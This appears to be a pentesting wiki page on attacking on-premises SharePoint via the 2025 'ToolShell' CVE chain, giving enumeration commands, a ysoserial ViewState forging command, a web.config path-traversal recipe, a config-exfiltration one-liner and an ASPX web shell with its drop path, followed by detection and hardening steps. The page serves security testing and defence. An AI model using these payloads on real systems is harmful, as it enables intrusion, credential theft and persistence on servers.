Microsoft SharePoint – Pentesting & Exploitation

Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS. Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface. This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).

1. Quick enumeration

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. 2025 exploit chain (a.k.a. “ToolShell”)

2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> allows arbitrary Server-Side Include code to be injected in the page which is later compiled by ASP.NET. An attacker can embed C# that executes Process.Start() and drop a malicious ViewState.

2.2 CVE-2025-49706 – Improper Authentication Bypass

The same page trusts the X-Forms_BaseUrl header to determine the site context. By pointing it to /_layouts/15/, MFA/SSO enforced at the root site can be bypassed unauthenticated.

2.3 CVE-2025-53770 – Unauthenticated ViewState Deserialization → RCE

Once the attacker controls a gadget in ToolPane.aspx they can post an unsigned (or MAC-only) __VIEWSTATE value that triggers .NET deserialization inside w3wp.exe leading to code execution.

If signing is enabled, steal the ValidationKey/DecryptionKey from any web.config (see 2.4) and forge the payload with ysoserial.net or ysodom:

ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
    ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

For an in-depth explanation on abusing ASP.NET ViewState read: {{#ref}} ../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md {{#endref}}

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Sending a crafted Source parameter to ToolPane.aspx (e.g. ../../../../web.config) returns the targeted file, allowing leakage of:

• <machineKey validationKey="…" decryptionKey="…"> ➜ forge ViewState / ASPXAUTH cookies
• connection strings & secrets.

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting debug_dev.js can be downloaded anonymously and contains all sensitive configuration.

3.2 Deploy a Base64-encoded ASPX web shell (variation-2)

powershell.exe -EncodedCommand <base64>

Decoded payload example (shortened):

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e){
        Response.Write(MachineKey.ValidationKey);
        // echo secrets or invoke cmd
    }
</script>

Written to:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.

3.3 Obfuscated variant (variation-3)

Same shell but:

• dropped under ...\15\TEMPLATE\LAYOUTS\
• variable names reduced to single letters
• Thread.Sleep(<ms>) added for sandbox-evasion & timing-based AV bypass.

4. Detection ideas

Example XDR / Sysmon rule (pseudo-XQL):

proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powershell.exe")

5. Hardening & Mitigation

1. Patch – July 2025 security updates fix all four CVEs.
2. Rotate every <machineKey> and ViewState secrets after compromise.
3. Remove LAYOUTS write permission from WSS_WPG & WSS_ADMIN_WPG groups.
4. Block external access to /_layouts/15/ToolPane.aspx at proxy/WAF level.
5. Enable ViewStateUserKey, MAC enabled, and custom EventValidation.

Related tricks

• IIS post-exploitation & web.config abuse:
  {{#ref}} ../../network-services-pentesting/pentesting-web/iis-internet-information-services.md {{#endref}}

References

• Unit42 – Active Exploitation of Microsoft SharePoint Vulnerabilities
• GitHub PoC – ToolShell exploit chain
• Microsoft Security Advisory – CVE-2025-49704 / 49706
• Microsoft Security Advisory – CVE-2025-53770 / 53771